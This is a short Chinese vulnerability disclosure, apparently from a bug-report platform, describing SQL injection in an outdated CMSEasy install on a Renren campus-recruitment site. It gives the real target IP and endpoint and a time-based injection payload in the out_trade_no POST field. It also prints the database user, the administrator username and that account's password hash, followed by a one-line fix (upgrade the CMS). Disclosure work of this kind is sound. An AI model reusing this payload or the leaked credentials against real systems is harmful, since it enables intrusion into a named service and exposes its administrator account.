人人网某站点存在sql注入漏洞存在mysql注入的站点:http://iweidu.renren.com/
是个校园招聘团队。使用的是cmseasy老版本,存在注入漏洞。
post提交:
http://60.28.218.94/index.php/admin/?case=archive&act=respond&code=alipay&trade_status=WAIT_SELLER_SEND_GOODS
postdata:out_trade_no=id=sleep(2)
user:s510906db0wd@localhost
注出管理员账户:weidu
密码:2d3c8d981c47e1ab6277a82d95e6a677
修复方案:
升级cms至最新版。